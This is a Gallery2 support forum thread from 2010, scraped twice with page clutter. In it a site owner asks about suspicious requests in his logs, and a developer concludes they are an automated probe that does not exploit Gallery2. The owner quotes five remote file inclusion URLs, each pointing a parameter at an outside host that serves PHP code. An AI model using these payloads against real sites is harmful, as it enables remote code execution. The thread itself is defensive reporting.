Exploit? PHP File injection? Suspicious URls to my gallery2.3.1 Update: Gallery2 secure!

Asspalmer

Joined: 2005-10-12
Posts: 3

Posted: Thu, 2010-01-28 22:13

I keep seeing people hit my installation with URLs like this.

http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html//errors.php&error=http://www.anabolex.com/gallery/uploads/16570/hosting/a??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt??
http://mysite.c0m/gallery/main.php?g2_path=/index.php//index.php&mosConfig_absolute_path=http://www.focusi.net/bbs/data/board_free/satu.txt??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20////&_SERVER[DOCUMENT_ROOT]=http://julie.pwo.ca/idxx.txt???
(dont click this isnt my actual site)

They show up in my Gallery2 log with the error "Error (ERROR_MISSING_OBJECT)"

I look at these sites its appending on the URL and its a text file with some php in it, seems like some kind of PHP injection attack. Is my site vulnerable? I was running 2.3 and the site was broken, tho it wokred the other day, so I updated to 2.3.1 and now I am back up but am just wondering if this is a known exploit or if its old and fixed in 2.3.1.

edit: OH! I only discovered this because Google sent me an email saying my site was compromised, however the "malware" links they provided and claimed I was hosting did not exist on my server so I am kind of confused why I got that.

bharat

Joined: 2002-05-21
Posts: 7934

Posted: Fri, 2010-01-29 01:11

It looks to me like a fishing attempt to try to find a vulnerability. We're always interested in possible security vulnerabilities, though so if you can email the details to

we'll be happy to investigate and see if we can figure out what's going on.
---
Problems? Check gallery3/var/logs
bugs/feature req's | upgrade to the latest code | use git

Asspalmer

Joined: 2005-10-12
Posts: 3

Posted: Fri, 2010-01-29 02:09

OK will do. My site is getting hammered with those types of requests literally every minute or so, so something is going on.

bharat

Joined: 2002-05-21
Posts: 7934

Posted: Fri, 2010-01-29 17:44

Followup: We talked offline and looked at the traffic and believe that this is a automated attack that is not turning up a vulnerability in Gallery2.
---
Problems? Check gallery3/var/logs
bugs/feature req's | upgrade to the latest code | use git

Asspalmer Joined: 2005-10-12 Posts: 3	Posted: Thu, 2010-01-28 22:13
	I keep seeing people hit my installation with URLs like this. http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt?? http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html//errors.php&error=http://www.anabolex.com/gallery/uploads/16570/hosting/a?? http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt?? http://mysite.c0m/gallery/main.php?g2_path=/index.php//index.php&mosConfig_absolute_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20////&_SERVER[DOCUMENT_ROOT]=http://julie.pwo.ca/idxx.txt??? (dont click this isnt my actual site) They show up in my Gallery2 log with the error "Error (ERROR_MISSING_OBJECT)" I look at these sites its appending on the URL and its a text file with some php in it, seems like some kind of PHP injection attack. Is my site vulnerable? I was running 2.3 and the site was broken, tho it wokred the other day, so I updated to 2.3.1 and now I am back up but am just wondering if this is a known exploit or if its old and fixed in 2.3.1. edit: OH! I only discovered this because Google sent me an email saying my site was compromised, however the "malware" links they provided and claimed I was hosting did not exist on my server so I am kind of confused why I got that.
	XUser login Username: * Password: * Create new account Request new password
bharat Joined: 2002-05-21 Posts: 7934	Posted: Fri, 2010-01-29 01:11
	It looks to me like a fishing attempt to try to find a vulnerability. We're always interested in possible security vulnerabilities, though so if you can email the details to we'll be happy to investigate and see if we can figure out what's going on. --- Problems? Check gallery3/var/logs bugs/feature req's \| upgrade to the latest code \| use git

Asspalmer Joined: 2005-10-12 Posts: 3	Posted: Fri, 2010-01-29 02:09
	OK will do. My site is getting hammered with those types of requests literally every minute or so, so something is going on.

bharat Joined: 2002-05-21 Posts: 7934	Posted: Fri, 2010-01-29 17:44
	Followup: We talked offline and looked at the traffic and believe that this is a automated attack that is not turning up a vulnerability in Gallery2. --- Problems? Check gallery3/var/logs bugs/feature req's \| upgrade to the latest code \| use git

Exploit? PHP File injection? Suspicious URls to my gallery2.3.1 Update: Gallery2 secure!

XUser login